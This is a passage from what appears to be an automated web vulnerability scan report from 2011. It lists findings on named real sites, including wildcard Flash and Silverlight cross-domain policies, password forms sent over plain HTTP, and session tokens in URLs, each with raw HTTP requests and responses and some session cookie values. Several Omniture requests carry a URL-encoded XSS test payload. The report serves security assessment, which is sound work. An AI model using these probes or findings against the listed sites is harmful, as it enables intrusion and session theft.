GET /crossdomain.xml HTTP/1.0
Host: login.dotomi.com

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:32:42 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2
X-Name: dmc-s09
Last-Modified: Tue, 08 Sep 2009 04:16:43 GMT
ETag: "8d6006f-a1-473093bdbc0c0"
Accept-Ranges: bytes
Content-Length: 161
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!-- http://*.dotomi.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*.dotomi.com" />
</cross-domain-policy>

5.24. http://pagead2.googlesyndication.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Fri, 02 Sep 2011 23:20:19 GMT
Expires: Sat, 03 Sep 2011 23:20:19 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 85471
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

5.25. http://w.sharethis.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://w.sharethis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: w.sharethis.com

Response

HTTP/1.0 200 OK
Server: nginx/0.8.53
Content-Type: text/xml
Content-Length: 330
Last-Modified: Mon, 29 Aug 2011 16:55:44 GMT
Accept-Ranges: bytes
X-N: S
Date: Sat, 03 Sep 2011 21:33:13 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*.meandmybadself.com" />
<allow-access-from domain="*.sharethis.com" />
...[SNIP]...

5.26. http://www.godaddy.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.godaddy.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 03 Sep 2011 21:30:14 GMT
Connection: close
Content-Length: 150

<?xml version="1.0"?><cross-domain-policy><allow-access-from domain="*.wsimg.com" /><allow-access-from domain="*.godaddy.com" /></cross-domain-policy>

5.27. https://www.godaddy.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.godaddy.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 03 Sep 2011 21:47:31 GMT
Connection: close
Content-Length: 150

<?xml version="1.0"?><cross-domain-policy><allow-access-from domain="*.wsimg.com" /><allow-access-from domain="*.godaddy.com" /></cross-domain-policy>

5.28. http://www.youtube-nocookie.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.youtube-nocookie.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.youtube-nocookie.com

Response

HTTP/1.0 200 OK
Date: Sat, 03 Sep 2011 17:32:20 GMT
Server: Apache
Last-Modified: Thu, 01 Sep 2011 18:22:13 GMT
ETag: "132-4abe552de3f40"
Accept-Ranges: bytes
Content-Length: 306
Content-Type: application/xml

<?xml version="1.0"?>
<!-- http://www.youtube.com/crossdomain.xml -->
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="s.ytimg.com" />
...[SNIP]...

5.29. http://stats.wordpress.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stats.wordpress.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: stats.wordpress.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 03 Sep 2011 21:36:42 GMT
Content-Type: text/xml
Connection: close
Content-Length: 585
Last-Modified: Wed, 27 Apr 2011 19:00:53 GMT
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy><site-control permitted-cross-domain-policies="master-only" /><allow-access-from domain="v.wordpress.com" to-ports="80,443" /><allow-access-from domain="v0.wordpress.com" to-ports="80,443" secure="false" /><allow-access-from domain="videopress.com" to-ports="80,443" secure="false" /><allow-access-from domain="s0.videopress.com" to-ports="80,443" secure="false" /><allow-access-from domain="realeyes.com" to-ports="80,443" />
...[SNIP]...

6. Silverlight cross-domain policy
There are 2 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


6.1. http://stats.wordpress.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://stats.wordpress.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: stats.wordpress.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 03 Sep 2011 21:36:42 GMT
Content-Type: text/xml
Connection: close
Content-Length: 309
Last-Modified: Mon, 06 Jun 2011 00:17:52 GMT
Accept-Ranges: bytes

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<grant-to>

...[SNIP]...

6.2. http://value.register.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://value.register.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: value.register.com

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:32:57 GMT
Server: Omniture DC/2.0.0
xserver: www68
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7. Cleartext submission of password
There are 2 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


7.1. http://vasco.com/login.aspx

Summary

Severity:   High
Confidence:   Certain
Host:   http://vasco.com
Path:   /login.aspx

Issue detail

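The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://vasco.com/login.aspx?ReturnUrl=%2ftraining%2four_offering%2felearning%2fcertified_ethical_hacking.aspx

The form contains the following password field:

ctl00$Columns$userLogin$loginUser$Password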

Request

GET /login.aspx?ReturnUrl=%2ftraining%2four_offering%2felearning%2fcertified_ethical_hacking.aspx HTTP/1.1
Host: vasco.com
Proxy-Connection: keep-alive
Referer: http://vasco.com/training/our_offering/elearning/certified_ethical_hacking.aspx
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=scg42x55p3xbinitbik3gp45; __utma=144557234.91160880.1315071157.1315071157.1315071157.1; __utmb=144557234.8.10.1315071157; __utmc=144557234; __utmz=144557234.1315071157.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sat, 03 Sep 2011 17:35:34 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 24790

<? xml version=1.0" encoding=UTF-8" ?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
<body>
<form name="aspnetForm" method="post" action="login.aspx?ReturnUrl=%2ftraining%2four_offering%2felearning%2fcertified_ethical_hacking.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div>
...[SNIP]...
<td><input name="ctl00$Columns$userLogin$loginUser$Password" type="password" id="ctl00_Columns_userLogin_loginUser_Password" style="width:250px;" /><span id="ctl00_Columns_userLogin_loginUser_PasswordRequired" title="Password is required." style="color:Red;visibility:hidden;">
...[SNIP]...

7.2. http://vasco.com/user_registration.aspx

Summary

Severity:   High
Confidence:   Certain
Host:   http://vasco.com
Path:   /user_registration.aspx

Issue detail

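The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://vasco.com/user_registration.aspx

The form contains the following password fields:

ctl00$Content$_txtstatic_password
ctl00$Content$confirm_password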

Request

GET /user_registration.aspx HTTP/1.1
Host: vasco.com
Proxy-Connection: keep-alive
Referer: http://vasco.com/login.aspx?ReturnUrl=%2ftraining%2four_offering%2felearning%2fcertified_ethical_hacking.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=scg42x55p3xbinitbik3gp45; __utma=144557234.91160880.1315071157.1315071157.1315071157.1; __utmb=144557234.9.10.1315071157; __utmc=144557234; __utmz=144557234.1315071157.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sat, 03 Sep 2011 17:35:44 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 42057

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
<body>
   <form name="aspnetForm" method="post" action="user_registration.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div>
...[SNIP]...
<p><input name="ctl00$Content$_txtstatic_password" type="password" maxlength="50" id="ctl00_Content__txtstatic_password" class="required" style="width:228px" /></p>
...[SNIP]...
<p><input name="ctl00$Content$confirm_password" type="password" maxlength="50" id="ctl00_Content_confirm_password" class="required" style="width:228px" /></p>
...[SNIP]...

8. Session token in URL
There are 15 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


8.1. http://bh.contextweb.com/bh/set.aspx

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /bh/set.aspx?action=replace&advid=749&token=DOTM5 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_fid=101&dtm_cid=2304&dtm_cmagic=e6c2dc&dtm_format=5&cli_promo_id=1&dtm_user_id=&dtmc_user_type=NEW&dtmc_product_type=Home&dtmc_product_id=TTN%3A%20Home&dtmc_domain_name=&dtm_items=&dtmc_domain_status=&dtmc_domain_variations=&dtmc_source=WWW000000000W&dtmc_ref=&dtmc_loc=http%3A//www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: cw-app602
Set-Cookie: V=PpAVCxNh2PJr; Domain=.contextweb.com; Expires=Tue, 28-Aug-2012 21:33:49 GMT; Path=/
Set-Cookie: cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%0A749%3B09%2F17%2F2011%3BDOTM5; Domain=.contextweb.com; Expires=Sun, 07-Aug-2016 21:33:49 GMT; Path=/
Content-Type: image/gif
Date: Sat, 03 Sep 2011 21:33:49 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

8.2. http://l.sharethis.com/pview

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://l.sharethis.com
Path:   /pview

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /pview?event=pview&source=share4x&publisher=null&hostname=www.hostnj.net&location=%2Fproducts-page%2Fssl-security%2Fcomodo-intranet-ssl-certificate%2F&url=http%3A%2F%2Fwww.hostnj.net%2Fproducts-page%2Fssl-security%2Fcomodo-intranet-ssl-certificate%2F&sessionID=1315085425389.39976&fpc=c6276e8-13231331aee-5ff43484-1&ts1315085426455.0&refDomain=www.google.com&refQuery=sourceid%3Dchrome%26ie%3DUTF-8%26q%3Dssl%2Bcertificates%23q%3Dssl%2Bcertificates%26hl%3Den%26prmd%3Divnsufd%26source%3Dlnms%26tbm%3Dshop%26ei%3D_5tiTr_COO_SiAKums2VCg%26sa%3DX%26oi%3Dmode_link%26ct%3Dmode%26cd%3D5%26ved%3D0CFYQ_AUoBA%26bav%3Don.2%2Cor.r_gc.r_pw.%26fp%3Dd8e70e66cd7c7a51%26biw%3D1233%26bih%3D1037 HTTP/1.1
Host: l.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.hostnj.net/products-page/ssl-security/comodo-intranet-ssl-certificate/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CqCKBE5ezzUzVT7FCnHuAg==

Response

HTTP/1.1 204 No Content
Server: nginx/0.7.65
Date: Sat, 03 Sep 2011 21:36:49 GMT
Connection: keep-alive


8.3. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://omnituremarketing.tt.omtrdc.net
Path:   /m2/omnituremarketing/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/omnituremarketing/mbox/standard?mboxHost=www.omniture.com&mboxSession=1315061061832-261883&mboxPC=1313976253453-233900.19&mboxPage=1315061061832-261883&screenHeight=1200&screenWidth=1920&browserWidth=1069&browserHeight=513&browserTimeOffset=-300&colorDepth=16&mboxCount=1&profile.geo_ip=50.23.123.106&profile.geo_zip=75207&profile.geo_gmt_offset=-500&profile.geo_country=usa&profile.geo_country_code=840&profile.geo_region=tx&profile.geo_region_code=44&profile.geo_city=dallas&profile.geo_city_code=77&mbox=omniTargetingInfo&mboxId=0&mboxTime=1315043065881&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss()%7Balert(%2527XSS%2527)%253B%7D&mboxReferrer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&mboxVersion=40 HTTP/1.1
Host: omnituremarketing.tt.omtrdc.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/

Response

HTTP/1.1 200 OK
pragma: no-cache
Content-Type: text/javascript
Content-Length: 2488
Date: Sat, 03 Sep 2011 14:43:47 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('default').get('omniTargetingInfo',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mboxImported-defaul
...[SNIP]...

8.4. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://omnituremarketing.tt.omtrdc.net
Path:   /m2/omnituremarketing/sc/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/omnituremarketing/sc/standard?mboxHost=www.omniture.com&mboxSession=1315061061832-261883&mboxPC=1313976253453-233900.19&mboxPage=1315061061832-261883&screenHeight=1200&screenWidth=1920&browserWidth=1069&browserHeight=513&browserTimeOffset=-300&colorDepth=16&mboxCount=9&mbox=SiteCatalyst%3A%20event&mboxId=0&mboxTime=1315043077971&charSet=UTF-8&visitorNamespace=omnituremarketing&cookieLifetime=31536000&pageName=Omniture%3A%20Homepage&currencyCode=USD&channel=Home&server=www.omniture.com&events=event69&resolution=1920x1200&javascriptVersion=1.7&javaEnabled=Y&cookiesEnabled=Y&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkDownloadFileTypes=exe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cdoc%2Cpdf%2Cxls%2Czxp%2Cxlsx%2Cdocx%2Cmp4%2Cm4v&linkInternalFilters=javascript%3A%2C207%2C2o7%2Csitecatalyst%2Comniture%2Cwww.registerat.com%2Cthelink.omniture.com&linkTrackVars=None&linkTrackEvents=None&eVar3=Now%20Defined%20by%20Test%20and%20Target&eVar4=English&prop5=Now%20Defined%20by%20Test%20and%20Target&prop6=English&prop14=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss()%7Balert(%2527XSS%2527)%253B%7D&eVar17=8%3A30AM&eVar35=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss()%7Balert(%2527XSS%2527)%253B%7D&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss()%7Balert(%2527XSS%2527)%253B%7D&mboxReferrer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&mboxVersion=40&scPluginVersion=1 HTTP/1.1
Host: omnituremarketing.tt.omtrdc.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/

Response

HTTP/1.1 200 OK
Content-Length: 146
Date: Sat, 03 Sep 2011 14:44:01 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').get('SiteCatalyst: event', 0).setOffer(new mboxOfferDefault()).loaded();}

8.5. http://registercom.tt.omtrdc.net/m2/registercom/mbox/standard

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://registercom.tt.omtrdc.net
Path:   /m2/registercom/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/registercom/mbox/standard?mboxHost=www.register.com&mboxSession=1315085400638-452340&mboxPage=1315085400638-452340&screenHeight=1200&screenWidth=1920&browserWidth=1233&browserHeight=1037&browserTimeOffset=-300&colorDepth=16&mboxCount=2&mbox=homepageRedirect&mboxId=0&mboxTime=1315067402071&mboxURL=http%3A%2F%2Fwww.register.com%2F&mboxReferrer=&mboxVersion=39 HTTP/1.1
Host: registercom.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
pragma: no-cache
Content-Type: text/javascript
Content-Length: 797
Date: Sat, 03 Sep 2011 21:29:23 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('default').get('homepageRedirect',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mboxImported-default
...[SNIP]...

8.6. http://registercom.tt.omtrdc.net/m2/registercom/sc/standard

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://registercom.tt.omtrdc.net
Path:   /m2/registercom/sc/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/registercom/sc/standard?mboxHost=www.register.com&mboxSession=1315085400638-452340&mboxPage=1315085400638-452340&screenHeight=1200&screenWidth=1920&browserWidth=1233&browserHeight=1037&browserTimeOffset=-300&colorDepth=16&mboxCount=11&mbox=SiteCatalyst%3A%20event&mboxId=0&mboxTime=1315067414617&charSet=ISO-8859-1&visitorNamespace=registercom&pageName=TTN%3A%20Home&currencyCode=USD&channel=TTN%3A%20Home&server=www.register.com&resolution=1920x1200&javascriptVersion=1.6&javaEnabled=Y&cookiesEnabled=Y&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkDownloadFileTypes=exe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cdoc%2Cpdf%2Cxls&linkInternalFilters=javascript%3A%2Crodopi%2Cregister&linkTrackVars=None&linkTrackEvents=None&prop6=Unknown&eVar6=Unknown&prop11=Unknown%3A%20TTN%3A%20Home&mboxURL=http%3A%2F%2Fwww.register.com%2F&mboxReferrer=&mboxVersion=39&scPluginVersion=1 HTTP/1.1
Host: registercom.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
